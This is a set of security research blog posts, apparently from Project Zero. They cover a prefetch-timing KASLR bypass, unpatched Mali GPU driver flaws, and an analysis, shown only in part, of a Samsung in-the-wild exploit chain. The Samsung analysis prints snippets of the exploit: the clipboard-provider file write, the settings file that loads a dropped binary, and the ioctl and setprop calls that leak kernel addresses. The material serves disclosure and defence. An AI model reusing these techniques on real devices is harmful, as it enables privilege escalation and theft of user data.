Fetching the KASLR slide with prefetch

Upon reporting this bug to the Linux kernel security team, our suggestion was to start randomizing the location of the percpu cpu_entry_area (CEA), and consequently the associated exception and syscall entry stacks. This is an effective mitigation against remote attackers but is insufficient to prevent a local attacker from taking advantage. 6 years ago, Daniel Gruss et al. discovered a new more reliable technique for exploiting the TLB timing side channel in x86 CPU’s. Their results demonstrated that prefetch instructions executed in user mode retired at statistically significant different latencies depending on whether the requested virtual address to be prefetched was mapped vs unmapped, even if that virtual address was only mapped in kernel mode. kPTI was helpful in mitigating this side channel, however, most modern CPUs now have innate protection for Meltdown, which kPTI was specifically designed to address, and thusly kPTI (which has significant performance implications) is disabled on modern microarchitectures. That decision means it is once again possible to take advantage of the prefetch side channel to defeat not only KASLR, but also the CPU entry area randomization mitigation, preserving the viability of the CEA stack corruption exploit technique against modern X86 CPUs.


There are surprisingly few fast and reliable examples of this prefetch KASLR bypass technique available in the open source realm, so I made the decision to write one.

Implementation

The meat of implementing this technique effectively is in serially reading the processor’s time stamp counter before and after performing a prefetch. Daniel Gruss helpfully provided highly effective and open source code for doing just that. The only edit I made (as suggested by Jann Horn) was to swap to using lfence instead of cpuid as the serializing instruction, as cpuid is emulated in VM environments. It also became apparent in practice that there was no need to perform any cache-flushing routines in order to witness the side-channel effect. It is simply enough to time every prefetch attempt.


Generating prefetch timings for all 512 possible KASLR slots yields quite a bit of fuzzy data in need of analyzing. To minimize noise, multiple samples of each tested address are taken, and the minimum value from that set of samples is used in the results as the representative value for an address. On the Tiger Lake CPU this test was primarily performed on, no more than 16 samples per slot were needed to generate exceptionally reliable results. Low-resolution minimum prefetch time slot identification narrows down the area to search in while avoiding false positives for the higher resolution edge-detection code which finds the precise address at which prefetch dramatically drops in run-time. The result of this effort is a PoC which can correctly identify the KASLR slide on my local machine with 99.999% accuracy (95% accuracy in a VM) while running faster than it takes to grep through kallsyms for the kernel base address:


Breaking KASLR with Prefecth: Grepping through kallsyms took .077 seconds while using the prefetch technique took .013 seconds


This prefetch code does indeed work to find the locations of the randomized CEA regions in Peter Ziljstra’s proposed patch. However, the journey to that point results in code that demonstrates another deeply significant issue - KASLR is comprehensively compromised on x86 against local attackers, and has been for the past several years, and will be for the indefinite future. There are presently no plans in place to resolve the myriad microarchitectural issues that lead to side channels like this one. Future work is needed in this area in order to preserve the integrity of KASLR, or alternatively, it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.

Conclusion

This exploit demonstrates a highly reliable and agnostic technique that can allow a broad spectrum of uncontrolled arbitrary write primitives to achieve kernel code execution on x86 platforms. While it is possible to mitigate this exploit technique from a remote context, an attacker in a local context can utilize known microarchitectural side-channels to defeat the current mitigations. Additional work in this area might be valuable to continue to make exploitation more difficult, such as performing in-stack randomization so that the stack offset of the saved state changes on every taken IST exception. For now however, this remains a viable and powerful exploit strategy on x86 Linux.


Mind the Gap

22 November 2022 at 21:05

By Ian Beer, Project Zero

Note: The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable. 

Introduction

In June 2022, Project Zero researcher Maddie Stone gave a talk at FirstCon22 titled 0-day In-the-Wild Exploitation in 2022…so far. A key takeaway was that approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities. This finding is consistent with our understanding of attacker behavior: attackers will take the path of least resistance, and as long as vendors don't consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones.

The presentation discussed an in the wild exploit targeting the Pixel 6 and leveraging CVE-2021-39793, a vulnerability in the ARM Mali GPU driver used by a large number of other Android devices. ARM's advisory described the vulnerability as:

Title                    Mali GPU Kernel Driver may elevate CPU RO pages to writable

CVE                   CVE-2022-22706 (also reported in CVE-2021-39793)

Date of issue      6th January 2022

Impact                A non-privileged user can get a write access to read-only memory pages [sic].

The week before FirstCon22, Maddie gave an internal preview of her talk. Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).

Taking a closer look

One of these issues (2334) lead to kernel memory corruption, one (2331) lead to physical memory addresses being disclosed to userspace and the remaining three (2325, 2327, 2333) lead to a physical page use-after-free condition. These would enable an attacker to continue to read and write physical pages after they had been returned to the system.

For example, by forcing the kernel to reuse these pages as page tables, an attacker with native code execution in an app context could gain full access to the system, bypassing Android's permissions model and allowing broad access to user data.

Anecdotally, we heard from multiple sources that the Mali issues we had reported collided with vulnerabilities available in the 0-day market, and we even saw one public reference:

@ProjectZeroBugs\nArm Mali: driver exposes physical addresses to unprivileged userspace\n\n
 @jgrusko Replying to @ProjectZeroBugs\nRIP the feature that was there forever and nobody wanted to report :)

The "Patch gap" is for vendors, too

We reported these five issues to ARM when they were discovered between June and July 2022. ARM fixed the issues promptly in July and August 2022, disclosing them as security issues on their Arm Mali Driver Vulnerabilities page (assigning CVE-2022-36449) and publishing the patched driver source on their public developer website.

In line with our 2021 disclosure policy update we then waited an additional 30 days before derestricting our Project Zero tracker entries. Between late August and mid-September 2022 we derestricted these issues in the public Project Zero tracker: 2325, 2327, 2331, 2333, 2334.

When time permits and as an additional check, we test the effectiveness of the patches that the vendor has provided. This sometimes leads to follow-up bug reports where a patch is incomplete or a variant is discovered (for a recently compiled list of examples, see the first table in this blogpost), and sometimes we discover the fix isn't there at all.

In this case we discovered that all of our test devices which used Mali are still vulnerable to these issues. CVE-2022-36449 is not mentioned in any downstream security bulletins.

Conclusion

Just as users are recommended to patch as quickly as they can once a release containing security updates is available, so the same applies to vendors and companies. Minimizing the "patch gap" as a vendor in these scenarios is arguably more important, as end users (or other vendors downstream) are blocking on this action before they can receive the security benefits of the patch.

Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible.

A Very Powerful Clipboard: Analysis of a Samsung in-the-wild exploit chain

4 November 2022 at 15:50

Posted by Maddie Stone, Project Zero

Note: The three vulnerabilities discussed in this blog were all fixed in Samsung’s March 2021 release. They were fixed as CVE-2021-25337, CVE-2021-25369, CVE-2021-25370. To ensure your Samsung device is up-to-date under settings you can check that your device is running SMR Mar-2021 or later.

As defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the “ground truth” data about the vulnerabilities and exploit techniques they’re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there’s been tremendous progress in vendor’s transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.

While we understand that Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward, Samsung has committed to publicly sharing when vulnerabilities may be under limited, targeted exploitation, as part of their release notes.

We hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products.

The exploit sample

The Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a 3 vulnerability chain where all 3 vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.

The sample used three vulnerabilities, all patched in March 2021 by Samsung:

  1. Arbitrary file read/write via the clipboard provider - CVE-2021-25337
  2. Kernel information leak via sec_log - CVE-2021-25369
  3. Use-after-free in the Display Processing Unit (DPU) driver - CVE-2021-25370

The exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOCs depending on where they’re sold. For example the Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC and phones sold most other places (ex. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver which are specific to the Exynos Samsung phones.

Examples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.

The in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we’ve seen in other campaigns this year. TAG and Project Zero published detailed analyses of one of these campaigns in June.

Vulnerability #1 - Arbitrary filesystem read and write

The exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit is running as the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn’t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user.

Screenshot of the CVE-2021-25337 entry from Samsung's March 2021 security update. It reads: &quot;SVE-2021-19527 (CVE-2021-25337): Arbitrary file read/write vulnerability via unprotected clipboard content provider  Severity: Moderate Affected versions: P(9.0), Q(10.0), R(11.0) devices except ONEUI 3.1 in R(11.0) Reported on: November 3, 2020 Disclosure status: Privately disclosed. An improper access control in clipboard service prior to SMR MAR-2021 Release 1 allows untrusted applications to read or write arbitrary files in the device. The patch adds the proper caller check to prevent improper access to clipboard service.

About Android content providers

In Android, Content Providers manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are required to implement six abstract methods: query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.

According to the Android documentation:


All applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.

The vulnerability

Samsung created a custom clipboard content provider that runs within the system server. The system server is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.

Samsung added a custom clipboard content provider to the system server. This custom clipboard provider is specifically for images. In the com.android.server.semclipboard.SemClipboardProvider class, there are the following variables:


        DATABASE_NAME = ‘clipboardimage.db’

        TABLE_NAME = ‘ClipboardImageTable’

        URL = ‘content://com.sec.android.semclipboardprovider/images’

        CREATE_TABLE = " CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT,  _data TEXT NOT NULL);";

Unlike content providers that live in “normal” apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn’t have a manifest for any permissions to go in. Therefore it’s up to the code within the system server to do its own access checking.

UPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk. In this case, the entry for the SemClipboardProvider in the manifest is:

<provider android:name="com.android.server.semclipboard.SemClipboardProvider" android:enabled="true" android:exported="true" android:multiprocess="false" android:authorities="com.sec.android.semclipboardprovider" android:singleUser="true"/>

Like “normal” app-defined components, the system server could use the android:permission attribute to control access to the provider, but it does not. Since there is not a permission required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!

The ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the openFileHelper method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a ParcelFileDescriptor object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the getFd method to get the native file descriptor (fd) for the returned ParcelFileDescriptor.

    public Uri insert(Uri uri, ContentValues values) {

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

The function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control included in this function so any app, including the untrusted_app SELinux context, can modify the _data column directly. By calling insert, an app can open files via the system server that it wouldn’t usually be able to open on its own.

The exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.

ContentValues vals = new ContentValues();

vals.put("_data", "/data/system/users/0/newFile.bin");

URI semclipboard_uri = URI.parse("content://com.sec.android.semclipboardprovider")

ContentResolver resolver = getContentResolver();

URI newFile_uri = resolver.insert(semclipboard_uri, vals);

return resolver.openFileDescriptor(newFile_uri, "w").getFd(); 

Let’s walk through what is happening line by line:

  1. Create a ContentValues object. This holds the key, value pair that the caller wants to insert into a provider’s database table. The key is the column name and the value is the row entry.
  2. Set the ContentValues object: the key is set to “_data” and the value to an arbitrary file path, controlled by the exploit.
  3. Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.
  4. Get the ContentResolver object that allows apps access to ContentProviders.
  5. Call insert on the semclipboardprovider with our key-value pair.
  6. Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider’s openFile, which in this case simply calls openFileHelper.

The exploit wrote their next stage binary to the directory /data/system/users/0/. The dropped file will have an SELinux context of users_system_data_file. Normal untrusted_app’s don’t have access to open or create users_system_data_file files so in this case they are proxying the open through system_server who can open users_system_data_file. While untrusted_app can’t open users_system_data_file, it can read and write to users_system_data_file. Once the clipboard content provider opens the file and passess the fd to the calling process, the calling process can now read and write to it.

The exploit first uses this fd to write their next stage ELF file onto the file system. The contents for the stage 2 ELF were embedded within the original sample.

This vulnerability is triggered three more times throughout the chain as we’ll see below.

Fixing the vulnerability

To fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks if the PID of the calling process is UID 1000, meaning that it is already also running with system privileges.

  public Uri insert(Uri uri, ContentValues values) {

        if (Binder.getCallingUid() != 1000) {

            Log.e(TAG, "Fail to insert image clip uri. blocked the access of package : " + getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));

            return null;

        }

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

Executing the stage 2 ELF

The exploit has now written its stage 2 binary to the file system, but how do they load it outside of their current app sandbox? Using the Samsung Text to Speech application (SamsungTTS.apk).

The Samsung Text to Speech application (com.samsung.SMT) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used to gain code execution as system. What’s different this time though is that the exploit doesn’t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.

Older versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the System.load API.

The exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service which will then load its stage 2 executable file as system UID and system_app SELinux context.

To do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses these 2 different paths for its Settings files.

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>

      <map>

          <string name=\"eng-USA-Variant Info\">f00</string>\n"

          <string name=\"SMT_STUBCHECK_STATUS\">STUB_SUCCESS</string>\n"

          <string name=\"SMT_LATEST_INSTALLED_ENGINE_PATH\">/data/system/users/0/newFile.bin</string>\n"

      </map>

The SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate the process of the system loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load and the stage 2 ELF begins executing as the system user in the system_app SELinux context.

The exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that did this arbitrary file loading while others did not. App versions 3.0.04.14 and before included the arbitrary loading capability. It seems like devices released on Android 10 (Q) were released with the updated version of the SamsungTTS app which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 launched with version 3.0.08.18 of the SamsungTTS app, which does not include the functionality that would load the ELF.

Phones released on Android P and earlier seemed to have a version of the app pre-3.0.08.18 which does load the executable up through December 2020. For example, the SamsungTTS app from this A50 device on the November 2020 security patch level was 3.0.03.22, which did load from the Settings file.

Once the ELF file is loaded via the System.load api, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.

Vulnerability #2 - task_struct and sys_call_table address leak

Once the second stage ELF is running (and as system), the exploit then continues. The second vulnerability (CVE-2021-25369) used by the chain is an information leak to leak the address of the task_struct and sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.

The vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.

Screenshot of the CVE-2021-25369 entry from Samsung's March 2021 security update. It reads: &quot;SVE-2021-19897 (CVE-2021-25369): Potential kernel information exposure from sec_log  Severity: Moderate Affected versions: O(8.x), P(9.0), Q(10.0) Reported on: December 10, 2020 Disclosure status: Privately disclosed. An improper access control vulnerability in sec_log file prior to SMR MAR-2021 Release 1 exposes sensitive kernel information to userspace. The patch removes vulnerable file.

The exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break ASLR. WARN_ON is intended to only be used in situations where a kernel bug is detected because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg.

oid __warn(const char *file, int line, void *caller, unsigned taint,

            struct pt_regs *regs, struct warn_args *args)

{

        disable_trace_on_warning();

        pr_warn("------------[ cut here ]------------\n");

        if (file)

                pr_warn("WARNING: CPU: %d PID: %d at %s:%d %pS\n",

                        raw_smp_processor_id(), current->pid, file, line,

                        caller);

        else

                pr_warn("WARNING: CPU: %d PID: %d at %pS\n",

                        raw_smp_processor_id(), current->pid, caller);

        if (args)

                vprintk(args->fmt, args->args);

        if (panic_on_warn) {

                /*

                 * This thread may hit another WARN() in the panic path.

                 * Resetting this prevents additional WARN() from panicking the

                 * system on this thread.  Other threads are blocked by the

                 * panic_mutex in panic().

                 */

                panic_on_warn = 0;

                panic("panic_on_warn set ...\n");

        }

        print_modules();

        dump_stack();

        print_oops_end_marker();

        /* Just a warning, don't kill lockdep. */

        add_taint(taint, LOCKDEP_STILL_OK);

}

On Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it’s not readable by the exploit. 

a51:/ $ ls -alZ /dev/kmsg

crw-rw---- 1 root system u:object_r:kmsg_device:s0 1, 11 2022-10-27 21:48 /dev/kmsg

$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy

allow domain dev_type:lnk_file { getattr ioctl lock map open read };

allow system_server kmsg_device:chr_file { append getattr ioctl lock map open read write };

Samsung however has added a custom logging feature that copies kmsg to the sec_log. The sec_log is a file found at /data/log/sec_log.log.

The WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in release BX304L01B-SW-99002-r21p0-01rel1 in February 2020. However, the A51 (SM-A515F) and A50 (SM-A505F)  still used a vulnerable version of the driver (r19p0) as of January 2021.  

/**

 * kbasep_vinstr_hwcnt_reader_ioctl() - hwcnt reader's ioctl.

 * @filp:   Non-NULL pointer to file structure.

 * @cmd:    User command.

 * @arg:    Command's argument.

 *

 * Return: 0 on success, else error code.

 */

static long kbasep_vinstr_hwcnt_reader_ioctl(

        struct file *filp,

        unsigned int cmd,

        unsigned long arg)

{

        long rcode;

        struct kbase_vinstr_client *cli;

        if (!filp || (_IOC_TYPE(cmd) != KBASE_HWCNT_READER))

                return -EINVAL;

        cli = filp->private_data;

        if (!cli)

                return -EINVAL;

        switch (cmd) {

        case KBASE_HWCNT_READER_GET_API_VERSION:

                rcode = put_user(HWCNT_READER_API, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_HWVER:

                rcode = kbasep_vinstr_hwcnt_reader_ioctl_get_hwver(

                        cli, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_BUFFER_SIZE:

                rcode = put_user(

                        (u32)cli->vctx->metadata->dump_buf_bytes,

                        (u32 __user *)arg);

                break;

       

        [...]

        default:

                WARN_ON(true);

                rcode = -EINVAL;

                break;

        }

        return rcode;

}

Specifically the WARN_ON is in the function kbase_vinstr_hwcnt_reader_ioctl. To trigger, the exploit only needs to call an invalid ioctl number for the HWCNT driver and the WARN_ON will be hit. The exploit makes two ioctl calls: the first is the Mali driver’s HWCNT_READER_SETUP ioctl to initialize the hwcnt driver and be able to call ioctl’s and then to the hwcnt ioctl target with an invalid ioctl number: 0xFE.

   hwcnt_fd = ioctl(dev_mali_fd, 0x40148008, &v4);

   ioctl(hwcnt_fd, 0x4004BEFE, 0);

To trigger the vulnerability the exploit sends an invalid ioctl to the HWCNT driver a few times and then triggers a bug report by calling:

setprop dumpstate.options bugreportfull;

setprop ctl.start bugreport;

In Android, the property ctl.start starts a service that is defined in init. On the targeted Samsung devices, the SELinux policy for who has access to the ctl.start property is much more permissive than AOSP’s policy. Most notably in this exploit’s case, system_app has access to set ctl_start and thus initiate the bugreport.

allow at_distributor ctl_start_prop:file { getattr map open read };

allow at_distributor ctl_start_prop:property_service set;

allow bootchecker ctl_start_prop:file { getattr map open read };

allow bootchecker ctl_start_prop:property_service set;

allow dumpstate property_type:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:property_service set;

allow ikev2_client ctl_start_prop:file { getattr map open read };

allow ikev2_client ctl_start_prop:property_service set;

allow init property_type:file { append create getattr map open read relabelto rename setattr unlink write };

allow init property_type:property_service set;

allow keystore ctl_start_prop:file { getattr map open read };

allow keystore ctl_start_prop:property_service set;

allow mediadrmserver ctl_start_prop:file { getattr map open read };

allow mediadrmserver ctl_start_prop:property_service set;

allow multiclientd ctl_start_prop:file { getattr map open read };

allow multiclientd ctl_start_prop:property_service set;

allow radio ctl_start_prop:file { getattr map open read };

allow radio ctl_start_prop:property_service set;

allow shell ctl_start_prop:file { getattr map open read };

allow shell ctl_start_prop:property_service set;

allow surfaceflinger ctl_start_prop:file { getattr map open read };

allow surfaceflinger ctl_start_prop:property_service set;

allow system_app ctl_start_prop:file { getattr map open read };

allow system_app ctl_start_prop:property_service set;

allow system_server ctl_start_prop:file { getattr map open read };

allow system_server ctl_start_prop:property_service set;

allow vold ctl_start_prop:file { getattr map open read };

allow vold ctl_start_prop:property_service set;

allow wlandutservice ctl_start_prop:file { getattr map open read };

allow wlandutservice ctl_start_prop:property_service set;

The bugreport service is defined in /system/etc/init/dumpstate.rc:

service bugreport /system/bin/dumpstate -d -p -B -z \

        -o /data/user_de/0/com.android.shell/files/bugreports/bugreport

    class main

    disabled

    oneshot

The bugreport service in dumpstate.rc is a Samsung-specific customization. The AOSP version of dumpstate.rc doesn’t include this service.

The Samsung version of the dumpstate (/system/bin/dumpstate) binary then copies everything from /proc/sec_log to /data/log/sec_log.log as shown in the pseudo-code below. This is the first few lines of the dumpstate() function within the dumpstate binary. The dump_sec_log (symbols included within the binary) function copies everything from the path provided in argument two to the path provided in argument three.

  _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));

  LOBYTE(s) = 18;

  v650[0] = 0LL;

  s_8 = 17664LL;

  *(char **)((char *)&s + 1) = *(char **)"DUMPSTATE";

  DurationReporter::DurationReporter(v636, (__int64)&s, 0);

  if ( ((unsigned __int8)s & 1) != 0 )

    operator delete(v650[0]);

  dump_sec_log("SEC LOG", "/proc/sec_log", "/data/log/sec_log.log");

After starting the bugreport service, the exploit uses inotify to monitor for IN_CLOSE_WRITE events in the /data/log/ directory. IN_CLOSE_WRITE triggers when a file that was opened for writing is closed. So this watch will occur when dumpstate is finished writing to sec_log.log.

An example of the sec_log.log file contents generated after hitting the WARN_ON statement is shown below. The exploit combs through the file contents looking for two values on the stack that are at address *b60 and *bc0: the task_struct and the sys_call_table address.

<4>[90808.635627]  [4:    poc:25943] ------------[ cut here ]------------

<4>[90808.635654]  [4:    poc:25943] WARNING: CPU: 4 PID: 25943 at drivers/gpu/arm/b_r19p0/mali_kbase_vinstr.c:992 kbasep_vinstr_hwcnt_reader_ioctl+0x36c/0x664

<4>[90808.635663]  [4:    poc:25943] Modules linked in:

<4>[90808.635675]  [4:    poc:25943] CPU: 4 PID: 25943 Comm: poc Tainted: G        W       4.14.113-20034833 #1

<4>[90808.635682]  [4:    poc:25943] Hardware name: Samsung BEYOND1LTE EUR OPEN 26 board based on EXYNOS9820 (DT)

<4>[90808.635689]  [4:    poc:25943] Call trace:

<4>[90808.635701]  [4:    poc:25943] [<0000000000000000>] dump_backtrace+0x0/0x280

<4>[90808.635710]  [4:    poc:25943] [<0000000000000000>] show_stack+0x18/0x24

<4>[90808.635720]  [4:    poc:25943] [<0000000000000000>] dump_stack+0xa8/0xe4

<4>[90808.635731]  [4:    poc:25943] [<0000000000000000>] __warn+0xbc/0x164tv

<4>[90808.635738]  [4:    poc:25943] [<0000000000000000>] report_bug+0x15c/0x19c

<4>[90808.635746]  [4:    poc:25943] [<0000000000000000>] bug_handler+0x30/0x8c

<4>[90808.635753]  [4:    poc:25943] [<0000000000000000>] brk_handler+0x94/0x150

<4>[90808.635760]  [4:    poc:25943] [<0000000000000000>] do_debug_exception+0xc8/0x164

<4>[90808.635766]  [4:    poc:25943] Exception stack(0xffffff8014c2bb40 to 0xffffff8014c2bc80)

<4>[90808.635775]  [4:    poc:25943] bb40: ffffffc91b00fa40 000000004004befe 0000000000000000 0000000000000000

<4>[90808.635781]  [4:    poc:25943] bb60: ffffffc061b65800 000000000ecc0408 000000000000000a 000000000000000a

<4>[90808.635789]  [4:    poc:25943] bb80: 000000004004be30 000000000000be00 ffffffc86b49d700 000000000000000b

<4>[90808.635796]  [4:    poc:25943] bba0: ffffff8014c2bdd0 0000000080000000 0000000000000026 0000000000000026

<4>[90808.635802]  [4:    poc:25943] bbc0: ffffff8008429834 000000000041bd50 0000000000000000 0000000000000000

<4>[90808.635809]  [4:    poc:25943] bbe0: ffffffc88b42d500 ffffffffffffffea ffffffc96bda5bc0 0000000000000004

<4>[90808.635816]  [4:    poc:25943] bc00: 0000000000000000 0000000000000124 000000000000001d ffffff8009293000

<4>[90808.635823]  [4:    poc:25943] bc20: ffffffc89bb6b180 ffffff8014c2bdf0 ffffff80084294bc ffffff8014c2bd80

<4>[90808.635829]  [4:    poc:25943] bc40: ffffff800885014c 0000000020400145 0000000000000008 0000000000000008

<4>[90808.635836]  [4:    poc:25943] bc60: 0000007fffffffff 0000000000000001 ffffff8014c2bdf0 ffffff800885014c

<4>[90808.635843]  [4:    poc:25943] [<0000000000000000>] el1_dbg+0x18/0x74

The file /data/log/sec_log.log has the SELinux context dumplog_data_file which is widely accessible to many apps as shown below. The exploit is currently running within the SamsungTTS app which is the system_app SELinux context. While the exploit does not have access to /dev/kmsg due to SELinux access controls, it can access the same contents when they are copied to the sec_log.log which has more permissive access.

$ sesearch -A -t dumplog_data_file -c file -p open precompiled_sepolicy | grep _app

allow aasa_service_app dumplog_data_file:file { getattr ioctl lock map open read };

allow dualdar_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow platform_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow priv_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow system_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow teed_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow vzwfiltered_untrusted_app dumplog_data_file:file { getattr ioctl lock map open read };

Fixing the vulnerability

There were a few different changes to address this vulnerability:

  • Modified the dumpstate binary on the device – As of the March 2021 update, dumpstate no longer writes to /data/log/sec_log.log.
  • Removed the bugreport service from dumpstate.rc.

In addition there were a few changes made earlier in 2020 that when included would prevent this vulnerability in the future:

  • As mentioned above, in February 2020 ARM had released version r21p0 of the Mali driver which had replaced the WARN_ON with the more appropriate pr_warn which does not log a full backtrace. The March 2021 Samsung firmware included updating from version r19p0 of the Mali driver to r26p0 which used pr_warn instead of WARN_ON.
  • In April 2020, upstream Linux made a change to no longer include raw stack contents in kernel backtraces.

Vulnerability #3 - Arbitrary kernel read and write

The final vulnerability in the chain (CVE-2021-25370) is a use-after-free of a file struct in the Display and Enhancement Controller (DECON) Samsung driver for the Display Processing Unit (DPU). According to the upstream commit message, DECON is responsible for creating the video signals from pixel data. This vulnerability is used to gain arbitrary kernel read and write access.

Screenshot of the CVE-2021-25370 entry from Samsung's March 2021 security update. It reads: &quot;SVE-2021-19925 (CVE-2021-25370): Memory corruption in dpu driver  Severity: Moderate Affected versions: O(8.x), P(9.0), Q(10.0), R(11.0) devices with selected Exynos chipsets Reported on: December 12, 2020 Disclosure status: Privately disclosed. An incorrect implementation handling file descriptor in dpu driver prior to SMR Mar-2021 Release 1 results in memory corruption leading to kernel panic. The patch fixes incorrect implementation in dpu driver to address memory corruption.

Find the PID of android.hardware.graphics.composer

To be able to trigger the vulnerability the exploit needs an fd for the driver in order to send ioctl calls. To find the fd, the exploit has to to iterate through the fd proc directory for the target process. Therefore the exploit first needs to find the PID for the graphics process.

The exploit connects to LogReader which listens at /dev/socket/logdr. When a client connects to LogReader, LogReader writes the log contents back to the client. The exploit then configures LogReader to send it logs for the main log buffer (0), system log buffer (3), and the crash log buffer (4) by writing back to LogReader via the socket:

stream lids=0,3,4

The exploit then monitors the log contents until it sees the words ‘display’ or ‘SDM’. Once it finds a ‘display’ or ‘SDM’ log entry, the exploit then reads the PID from that log entry.

Now it has the PID of android.hardware.graphics.composer, where android.hardware.graphics composer is the Hardware Composer HAL.

